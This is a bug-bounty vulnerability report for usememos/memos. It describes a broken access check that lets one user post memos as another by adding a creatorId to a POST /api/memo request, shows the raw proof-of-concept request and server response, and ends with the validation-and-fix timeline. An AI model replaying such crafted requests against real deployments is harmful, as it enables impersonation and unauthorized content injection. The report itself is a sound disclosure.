An attacker can be post message in other memos page in usememos/memos


Reported on

Dec 26th 2022


An attacker can be post malicious content to other user's memos page via POST request, attacker just add an creatorID into body request and send it with Burpsuite

Here is video poc:

Proof of Concept

POST /api/memo HTTP/2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 116
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

"content":"post this message in demouser wall ","visibility":"PRIVATE",

Server Response:

HTTP/2 200 OK
Date: Mon, 26 Dec 2022 10:29:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 423
Cf-Ray: 77f9233de8d5231a-HKG
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
Server: cloudflare
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

{"data":{"id":1054,"rowStatus":"NORMAL","creatorId":104,"createdTs":1672050590,"updatedTs":1672050590,"content":"post this message in demouser wall ","visibility":"PRIVATE","pinned":false,"displayTs":1672050590,"creator":{"id":104,"rowStatus":"NORMAL","createdTs":1672035458,"updatedTs":1672035527,"username":"demouser","role":"USER","email":"","nickname":"demouser","openId":"","userSettingList":null},"resourceList":[]}}


This vulnerabily affect all user in memos.

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a exists a year ago
Nguyen Minh Quang modified the report
a year ago
We have contacted a member of the usememos/memos team and are waiting to hear back a year ago
STEVEN validated this vulnerability a year ago
quangdaik2362001 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
a year ago


Can u assign this as a CVE ?

STEVEN marked this as fixed in 0.9.1 with commit 3556ae a year ago
STEVEN has been awarded the fix bounty
This vulnerability has now been published a year ago
resource.go#L23 has been validated
to join this conversation